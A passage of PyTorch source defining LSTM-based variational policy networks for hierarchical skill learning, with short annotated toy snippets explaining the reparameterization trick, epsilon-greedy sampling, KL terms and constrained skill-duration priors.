noise = torch.randn_like(variance_outputs)
if greedy:
selected_z = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
selected_z = mean_outputs + variance_outputs * noise
# If single input and previous_z is None, this is the first timestep: set b to 1 and leave z as-is.
if input.shape[0]==1 and previous_z is None:
selected_b[0] = 1
# If previous_z is not None, this is not the first timestep; if b is 0, reuse the previous z.
elif input.shape[0]==1 and previous_z is not None:
if selected_b==0:
selected_z = previous_z
elif input.shape[0]>1:
# Now modify z's as per New Z Selection.
# Set initial b to 1.
selected_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if selected_b[t]==0:
selected_z[t] = selected_z[t-1]
return selected_z, selected_b, hidden
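# The "new z selection" loops above follow one rule: a new z takes effect only at
# timesteps where b_t == 1; while b_t == 0 the previous z is carried forward. A toy
# demonstration with made-up b and z tensors:

```python
import torch

b = torch.tensor([1, 0, 0, 1, 0])                                  # termination indicators
z = torch.arange(5, dtype=torch.float).unsqueeze(1).repeat(1, 2)   # one (toy) z row per timestep

for t in range(1, b.shape[0]):
    if b[t] == 0:          # no new skill chosen: hold the previous z
        z[t] = z[t - 1]
```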
class VariationalPolicyNetwork(PolicyNetwork_BaseClass):
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
# def __init__(self, input_size, hidden_size, number_subpolicies, number_layers=4, z_exploration_bias=0., b_exploration_bias=0., batch_size=1):
def __init__(self, input_size, hidden_size, number_subpolicies, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(VariationalPolicyNetwork, self).__init__()
self.args = args
self.input_size = input_size
self.hidden_size = hidden_size
self.number_subpolicies = number_subpolicies
self.output_size = number_subpolicies
self.num_layers = number_layers
self.z_exploration_bias = self.args.z_exploration_bias
self.b_exploration_bias = self.args.b_exploration_bias
self.z_probability_factor = self.args.z_probability_factor
self.b_probability_factor = self.args.b_probability_factor
self.batch_size = self.args.batch_size
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True)
# Transform to output space - Latent z and Latent b.
# THIS OUTPUT LAYER TAKES 2*HIDDEN SIZE as input because it's bidirectional.
self.subpolicy_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.termination_output_layer = torch.nn.Linear(2*self.hidden_size,2)
# Softmax activations for the Bernoulli termination probability and latent z selection.
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
def sample_latent_variables(self, subpolicy_outputs, termination_output_layer):
# Run sampling layers.
sample_z = self.sample_action(subpolicy_outputs)
sample_b = self.sample_action(termination_output_layer)
return sample_z, sample_b
def sample_latent_variables_epsilon_greedy(self, subpolicy_outputs, termination_output_layer, epsilon):
sample_z = self.select_epsilon_greedy_action(subpolicy_outputs, epsilon)
sample_b = self.select_epsilon_greedy_action(termination_output_layer, epsilon)
return sample_z, sample_b
def forward(self, input, epsilon, new_z_selection=True):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_z_preprobabilities = self.subpolicy_output_layer(outputs)*self.z_probability_factor + self.z_exploration_bias
# variational_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Add b continuation bias to the continuing option at every timestep.
variational_b_preprobabilities[:,0,0] += self.b_exploration_bias
variational_z_probabilities = self.batch_softmax_layer(variational_z_preprobabilities).squeeze(1)
variational_b_probabilities = self.batch_softmax_layer(variational_b_preprobabilities).squeeze(1)
variational_z_logprobabilities = self.batch_logsoftmax_layer(variational_z_preprobabilities).squeeze(1)
variational_b_logprobabilities = self.batch_logsoftmax_layer(variational_b_preprobabilities).squeeze(1)
# sampled_z_index, sampled_b = self.sample_latent_variables(variational_z_probabilities, variational_b_probabilities)
sampled_z_index, sampled_b = self.sample_latent_variables_epsilon_greedy(variational_z_probabilities, variational_b_probabilities, epsilon)
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
return sampled_z_index, sampled_b, variational_b_logprobabilities,\
variational_z_logprobabilities, variational_b_probabilities, variational_z_probabilities, None
def sample_action(self, action_probabilities):
# Categorical distribution sampling.
# Sampling can handle batched action_probabilities.
sample_action = torch.distributions.Categorical(probs=action_probabilities).sample()
return sample_action
def select_greedy_action(self, action_probabilities):
# Select the action with maximum probability (argmax over the last, action dimension) for test time.
return action_probabilities.argmax(dim=-1)
def select_epsilon_greedy_action(self, action_probabilities, epsilon=0.1):
# Batched epsilon-greedy: draw one uniform number per batch element, and for each
# element use the sampled action when its draw falls below epsilon, else the greedy action.
whether_greedy = torch.rand(action_probabilities.shape[0]).to(device)
sample_actions = torch.where(whether_greedy<epsilon, self.sample_action(action_probabilities), self.select_greedy_action(action_probabilities))
return sample_actions
def sample_termination(self, termination_probability):
sample_terminal = torch.distributions.Bernoulli(termination_probability).sample().squeeze(0)
return sample_terminal
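# The batched epsilon-greedy selection above can be sketched standalone: draw one
# uniform number per batch element, then use torch.where to pick, elementwise,
# between a Categorical sample and the greedy argmax. Probabilities here are toy values.

```python
import torch

probs = torch.tensor([[0.1, 0.9], [0.8, 0.2], [0.5, 0.5]])   # (batch, actions)
greedy = probs.argmax(dim=-1)
sampled = torch.distributions.Categorical(probs=probs).sample()

epsilon = 0.1
coin = torch.rand(probs.shape[0])                 # one draw per batch element
actions = torch.where(coin < epsilon, sampled, greedy)
```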
class ContinuousVariationalPolicyNetwork(PolicyNetwork_BaseClass):
# def __init__(self, input_size, hidden_size, z_dimensions, number_layers=4, z_exploration_bias=0., b_exploration_bias=0., batch_size=1):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousVariationalPolicyNetwork, self).__init__()
self.args = args
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = z_dimensions
self.num_layers = number_layers
self.z_exploration_bias = self.args.z_exploration_bias
self.b_exploration_bias = self.args.b_exploration_bias
self.z_probability_factor = self.args.z_probability_factor
self.b_probability_factor = self.args.b_probability_factor
self.batch_size = self.args.batch_size
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# Transform to output space - Latent z and Latent b.
# THIS OUTPUT LAYER TAKES 2*HIDDEN SIZE as input because it's bidirectional.
self.termination_output_layer = torch.nn.Linear(2*self.hidden_size,2)
# Softmax activations for the Bernoulli termination probability and latent z selection.
self.batch_softmax_layer = torch.nn.Softmax(dim=-1)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=-1)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
def forward(self, input, epsilon, new_z_selection=True, var_epsilon=0.001):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Add b continuation bias to the continuing option at every timestep.
variational_b_preprobabilities[:,0,0] += self.b_exploration_bias
variational_b_probabilities = self.batch_softmax_layer(variational_b_preprobabilities).squeeze(1)
variational_b_logprobabilities = self.batch_logsoftmax_layer(variational_b_preprobabilities).squeeze(1)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Softplus activation for the variance, since it must be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + var_epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
sampled_b = self.select_epsilon_greedy_action(variational_b_probabilities, epsilon)
if epsilon==0.:
sampled_z_index = mean_outputs.squeeze(1)
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
if self.args.reparam:
if self.args.train:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
# If evaluating, greedily get action.
else:
sampled_z_index = mean_outputs.squeeze(1)
else:
sampled_z_index = self.dists.sample().squeeze(1)
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
# Also compute logprobabilities of the latent_z's sampled from this net.
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
return sampled_z_index, sampled_b, variational_b_logprobabilities,\
variational_z_logprobabilities, variational_b_probabilities, variational_z_probabilities, kl_divergence, prior_loglikelihood
def sample_action(self, action_probabilities):
# Categorical distribution sampling.
# Sampling can handle batched action_probabilities.
sample_action = torch.distributions.Categorical(probs=action_probabilities).sample()
return sample_action
def select_greedy_action(self, action_probabilities):
# Select the action with maximum probability (argmax over the last, action dimension) for test time.
return action_probabilities.argmax(dim=-1)
def select_epsilon_greedy_action(self, action_probabilities, epsilon=0.1):
# Batched epsilon-greedy: draw one uniform number per batch element, and for each
# element use the sampled action when its draw falls below epsilon, else the greedy action.
whether_greedy = torch.rand(action_probabilities.shape[0]).to(device)
sample_actions = torch.where(whether_greedy<epsilon, self.sample_action(action_probabilities), self.select_greedy_action(action_probabilities))
return sample_actions
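# The KL term computed in forward() above has a closed form for a diagonal Gaussian
# N(mu, diag(var)) against the standard normal: 0.5 * sum(var + mu^2 - 1 - log(var)).
# A quick check that torch.distributions' kl_divergence agrees (toy mu/var values):

```python
import torch

mu = torch.tensor([0.5, -1.0])
var = torch.tensor([0.25, 2.0])

q = torch.distributions.MultivariateNormal(mu, torch.diag_embed(var))
p = torch.distributions.MultivariateNormal(torch.zeros(2), torch.eye(2))

kl = torch.distributions.kl_divergence(q, p)
closed_form = 0.5 * (var + mu ** 2 - 1.0 - var.log()).sum()
```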
class ContinuousVariationalPolicyNetwork_BPrior(ContinuousVariationalPolicyNetwork):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousVariationalPolicyNetwork_BPrior, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
def get_prior_value(self, elapsed_t, max_limit=5):
skill_time_limit = max_limit-1
if self.args.data in ['MIME','Roboturk','OrigRoboturk','FullRoboturk','Mocap']:
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# Choose a length of 12-16; prob_biases nudges the termination logits over that window.
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 16
skill_time_limit = 12
else:
max_limit = 20
skill_time_limit = max_limit-1
prior_value = torch.zeros((1,2)).to(device).float()
# If at or over hard limit.
if elapsed_t>=max_limit:
prior_value[0,1]=1.
# If at or more than typical, less than hard limit:
elif elapsed_t>=skill_time_limit:
if self.args.var_skill_length:
prior_value[0] = torch.tensor(prob_biases[elapsed_t-skill_time_limit]).to(device).float()
else:
# Leave the termination logit unbiased (no extra termination pressure yet).
prior_value[0,1]=0.
# If less than typical.
else:
# Continue.
prior_value[0,0]=1.
return prior_value
def forward(self, input, epsilon, new_z_selection=True):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Softplus activation for the variance, since it must be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
prev_time = 0
# Create variables for prior and probs.
prior_values = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_probabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_logprobabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
sampled_b = torch.zeros(input.shape[0]).to(device).int()
sampled_b[0] = 1
for t in range(1,input.shape[0]):
# Compute prior value.
delta_t = t-prev_time
prior_values[t] = self.get_prior_value(delta_t, max_limit=self.args.skill_length)
# Construct probabilities.
variational_b_probabilities[t,0,:] = self.batch_softmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
variational_b_logprobabilities[t,0,:] = self.batch_logsoftmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
sampled_b[t] = self.select_epsilon_greedy_action(variational_b_probabilities[t:t+1], epsilon)
if sampled_b[t]==1:
prev_time = t
if epsilon==0.:
sampled_z_index = mean_outputs.squeeze(1)
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
if self.args.reparam:
if self.args.train:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
# If evaluating, greedily get action.
else:
sampled_z_index = mean_outputs.squeeze(1)
else:
sampled_z_index = self.dists.sample().squeeze(1)
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
# Also compute logprobabilities of the latent_z's sampled from this net.
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
if self.args.debug:
print("#################################")
print("Embedding in Variational Network.")
embed()
return sampled_z_index, sampled_b, variational_b_logprobabilities.squeeze(1), \
variational_z_logprobabilities, variational_b_probabilities.squeeze(1), variational_z_probabilities, kl_divergence, prior_loglikelihood
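# The forward pass above draws latent z's with the reparameterization trick
# (z = mu + sigma * eps) so gradients can flow through the "sample". A minimal
# standalone sketch, with the network's mean/variance heads replaced by toy
# tensors of a hypothetical Sequence_Length x Batch_Size x z_dim shape:

```python
import torch

mu = torch.zeros(7, 1, 4, requires_grad=True)    # stand-in for mean_outputs
sigma = torch.ones(7, 1, 4, requires_grad=True)  # stand-in for variance_outputs
eps = torch.randn_like(sigma)                    # eps ~ N(0, I); needs no gradient
z = mu + sigma * eps                             # differentiable reparameterized sample
z.sum().backward()                               # gradients reach mu and sigma
```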
class ContinuousVariationalPolicyNetwork_ConstrainedBPrior(ContinuousVariationalPolicyNetwork_BPrior):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousVariationalPolicyNetwork_ConstrainedBPrior, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
if self.args.data=='MIME' or self.args.data=='Roboturk' or self.args.data=='OrigRoboturk' or self.args.data=='FullRoboturk' or self.args.data=='Mocap':
self.min_skill_time = 12
self.max_skill_time = 16
else:
self.min_skill_time = 4
self.max_skill_time = 6
def forward(self, input, epsilon, new_z_selection=True, batch_size=1):
# Input Format must be: Sequence_Length x Batch_Size x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Still need a softplus activation for variance because needs to be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
# Create variables for prior and probabilities.
prior_values = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_probabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_logprobabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
#######################################
################ Set B ################
#######################################
# Set the first b to 1, and track the last time at which b was 1.
# Changing to batching: sampled_b is Sequence_Length x Batch_Size.
sampled_b = torch.zeros(input.shape[0], self.args.batch_size).to(device).int()
sampled_b[0] = 1
prev_time = 0
for t in range(1,input.shape[0]):
# Compute time since the last b occurred.
delta_t = t-prev_time
# Compute prior value.
prior_values[t] = self.get_prior_value(delta_t, max_limit=self.args.skill_length)
# Construct probabilities.
variational_b_probabilities[t,0,:] = self.batch_softmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
variational_b_logprobabilities[t,0,:] = self.batch_logsoftmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
# Now Implement Hard Restriction on Selection of B's.
if delta_t < self.min_skill_time:
# Set B to 0. I.e. Continue.
# variational_b_probabilities[t,0,:] = variational_b_probabilities[t,0,:]*0
# variational_b_probabilities[t,0,0] += 1
sampled_b[t] = 0
elif (self.min_skill_time <= delta_t) and (delta_t < self.max_skill_time):
# Sample b.
sampled_b[t] = self.select_epsilon_greedy_action(variational_b_probabilities[t:t+1], epsilon)
elif self.max_skill_time <= delta_t:
# Set B to 1. I.e. select new z.
sampled_b[t] = 1
# If b is 1, set the previous time to now.
if sampled_b[t]==1:
prev_time = t
#######################################
################ Set Z ################
#######################################
# Now set the z's. If greedy, just return the means.
if epsilon==0.:
sampled_z_index = mean_outputs.squeeze(1)
# If not greedy, then reparameterize.
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
if self.args.train:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
# If evaluating, greedily get action.
else:
sampled_z_index = mean_outputs.squeeze(1)
# Modify z's based on whether b was 1 or 0. This part should remain the same.
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
# Also compute logprobabilities of the latent_z's sampled from this net.
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
if self.args.debug:
print("#################################")
print("Embedding in Variational Network.")
embed()
return sampled_z_index, sampled_b, variational_b_logprobabilities.squeeze(1), \
variational_z_logprobabilities, variational_b_probabilities.squeeze(1), variational_z_probabilities, kl_divergence, prior_loglikelihood
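# The forward above applies a hard constraint on skill duration: b is forced
# to 0 before min_skill_time, sampled freely in the window between the limits,
# and forced to 1 once max_skill_time is reached. A minimal sketch with toy
# limits and a coin flip standing in for the epsilon-greedy sampler:

```python
import numpy as np

rng = np.random.default_rng(1)
min_skill_time, max_skill_time = 4, 6

def constrained_b(delta_t):
    if delta_t < min_skill_time:
        return 0                      # too early: must continue current skill
    elif delta_t < max_skill_time:
        return int(rng.integers(2))   # in the free window: sample b
    else:
        return 1                      # at/over the max: must start a new skill
```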
class ContinuousVariationalPolicyNetwork_Batch(ContinuousVariationalPolicyNetwork_ConstrainedBPrior):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4, translation_network=False):
super(ContinuousVariationalPolicyNetwork_Batch, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
self.translation_network = translation_network
def get_prior_value(self, elapsed_t, max_limit=5, batch_size=None):
if batch_size is None:
batch_size = self.batch_size
skill_time_limit = max_limit-1
if self.args.data=='MIME' or self.args.data=='Roboturk' or self.args.data=='OrigRoboturk' or self.args.data=='FullRoboturk' or self.args.data=='Mocap':
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# Choose length of 12-16 with certain probabilities.
lens = np.array([12,13,14,15,16])
# probabilities = np.array([0.1,0.2,0.4,0.2,0.1])
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 16
skill_time_limit = 12
else:
max_limit = 20
skill_time_limit = max_limit-1
else:
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# probabilities = np.array([0.1,0.2,0.4,0.2,0.1])
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 6
skill_time_limit = 4
else:
max_limit = 5
skill_time_limit = max_limit-1
# Compute elapsed time - skill time limit.
delt = elapsed_t-skill_time_limit
# Initialize prior values.
prior_value = torch.zeros((batch_size,2)).to(device).float()
# Since we're evaluating multiple conditions over the batch, don't do this with if-else structures.
# Instead, set values of prior based on which of the following cases they fall into.
# print("Embedding in prior computation!")
# print("TIME: ",elapsed_t)
# print("Prior: ",prior_value)
# embed()
######################################
# CASE 1: If we're at / over the max limit:
######################################
condition_1 = torch.tensor((elapsed_t>=max_limit).astype(int)).to(device).float()
case_1_block = np.array([[0,1]])
case_1_value = torch.tensor(np.repeat(case_1_block, batch_size, axis=0)).to(device).float()
######################################
# CASE 2: If we're not over the max limit, but at/over the typical skill time length.
######################################
condition_2 = torch.tensor((elapsed_t>=skill_time_limit).astype(int)*(elapsed_t<max_limit).astype(int)).to(device).float()
# sel_indices = np.where(elapsed_t>=skill_time_limit)[0] # (Unused.)
intermediate_values = np.min([np.ones_like(delt,dtype=int)*3,np.max([np.zeros_like(delt,dtype=int),delt.astype(int)],axis=0)],axis=0)
# Create basic building block that's going to repeat, that we use for the var_skill_length=0 case.
block = np.array([[0,1]])
block_repeat = np.repeat(block, batch_size, axis=0)
# Create array that sets values based on var_skill_length cases.
case_2_value = torch.tensor((self.args.var_skill_length*prob_biases[intermediate_values]) + \
(1-self.args.var_skill_length)*block_repeat).to(device).float()
######################################
# CASE 3: If we're not over either the max limit or the typical skill time length.
######################################
condition_3 = torch.tensor((elapsed_t<skill_time_limit).astype(int)).to(device).float()
case_3_block = np.array([[1,0]])
case_3_value = torch.tensor(np.repeat(case_3_block, batch_size, axis=0)).to(device).float()
######################################
# Now set the prior values.
######################################
prior_value = condition_1.unsqueeze(1)*case_1_value + condition_2.unsqueeze(1)*case_2_value + condition_3.unsqueeze(1)*case_3_value
# Now return prior value.
return prior_value
####################################
####################################
# Unbatched prior computation.
# # If at or over hard limit.
# if elapsed_t>=max_limit:
# prior_value[0,1]=1.
# # If at or more than typical, less than hard limit:
# elif elapsed_t>=skill_time_limit:
# if self.args.var_skill_length:
# prior_value[0] = torch.tensor(prob_biases[elapsed_t-skill_time_limit]).to(device).float()
# else:
# # Random
# prior_value[0,1]=0.
# # If less than typical.
# else:
# # Continue.
# prior_value[0,0]=1.
# return prior_value
####################################
####################################
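# get_prior_value above replaces the unbatched if/elif/else with three
# mutually exclusive boolean masks that partition the batch; the prior is a
# mask-weighted sum of per-case [b=0, b=1] blocks. A minimal sketch of that
# case selection, with toy limits and the fixed-skill-length blocks:

```python
import numpy as np

skill_time_limit, max_limit = 4, 6
elapsed_t = np.array([2, 4, 7])                  # one entry per batch element

cond_over_max = (elapsed_t >= max_limit).astype(float)[:, None]
cond_typical = ((elapsed_t >= skill_time_limit) & (elapsed_t < max_limit)).astype(float)[:, None]
cond_under = (elapsed_t < skill_time_limit).astype(float)[:, None]

# Mask-weighted sum of [P(b=0) bias, P(b=1) bias] blocks; exactly one mask
# is active per batch element, so no per-element if/else is needed.
prior = cond_over_max * np.array([[0., 1.]]) \
      + cond_typical * np.array([[0., 1.]]) \
      + cond_under * np.array([[1., 0.]])
```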
# @gpu_profile
# @tprofile(immediate=True)
def forward(self, input, epsilon, new_z_selection=True, batch_size=None, batch_trajectory_lengths=None, precomputed_b=None, evaluate_z_probability=None):
##################################################
##################### Set A ######################
##################################################
if batch_size is None:
batch_size = self.batch_size
##################################################
# Pass through base LSTM.
##################################################
# Input Format must be: Sequence_Length x Batch_Size x Input_Size.
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
##################################################
# If usual variational network, predict b's.
##################################################
if not(self.translation_network):
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Create variables for prior and probabilities.
prior_values = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_probabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_logprobabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
##################################################
# Predict latent z's.
##################################################
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Still need a softplus activation for variance because needs to be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
##################################################
##################### Set B ######################
##################################################
if not(self.translation_network):
##################################################
# Initialize b's.
##################################################
# Set the first b to 1, and track the last time at which b was 1.
# sampled_b = torch.zeros(input.shape[0]).to(device).int()
# Changing to batching..
sampled_b = torch.zeros(input.shape[0], batch_size).to(device).int()
sampled_b[0] = 1
prev_time = np.zeros((batch_size))
##################################################
# Iterate over time and get b's.
##################################################
for t in range(1,input.shape[0]):
# Compute time since the last b occurred.
delta_t = t-prev_time
# Compute prior value.
# print("SAMPLED B: ", sampled_b[:t])
prior_values[t] = self.get_prior_value(delta_t, max_limit=self.args.skill_length, batch_size=batch_size)
# Construct probabilities.
variational_b_probabilities[t] = self.batch_softmax_layer(variational_b_preprobabilities[t] + prior_values[t])
variational_b_logprobabilities[t] = self.batch_logsoftmax_layer(variational_b_preprobabilities[t] + prior_values[t])
############################
# Batching versions of implementing hard restriction of selection of B's.
############################
# CASE 1: If we haven't reached the minimum skill execution time.
condition_1 = torch.tensor((delta_t<self.min_skill_time).astype(int)).to(device)
# CASE 2: If execution time is over the minimum skill execution time, but less than the maximum:
condition_2 = torch.tensor((delta_t>=self.min_skill_time).astype(int)*(delta_t<self.max_skill_time).astype(int)).to(device)
# CASE 3: If we have reached the maximum skill execution time.
condition_3 = torch.tensor((delta_t>=self.max_skill_time).astype(int)).to(device)
sampled_b[t] = condition_1*torch.zeros(1).to(device).float() + (condition_2*self.select_epsilon_greedy_action(variational_b_probabilities[t:t+1], epsilon)).squeeze(0) + \
condition_3*torch.ones(1).to(device).float()
# Now if sampled_b[t] ==1, set the prev_time of that batch element to current time t.
# Otherwise, let prev_time stay prev_time.
# Maybe a safer way to execute this:
prev_time[(torch.where(sampled_b[t]==1)[0]).cpu().detach().numpy()] = t
else:
# Here, we didn't need to actually compute b's. So just assign them from precomputed ones.
sampled_b = precomputed_b.detach()
##################################################
##################### Set Z ######################
##################################################
##################################################
# Get initial z predictions.
##################################################
# Now set the z's. If greedy, just return the means.
if epsilon==0. or not(self.args.train):
sampled_z_index = mean_outputs.squeeze(1)
# If not greedy, then reparameterize.
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
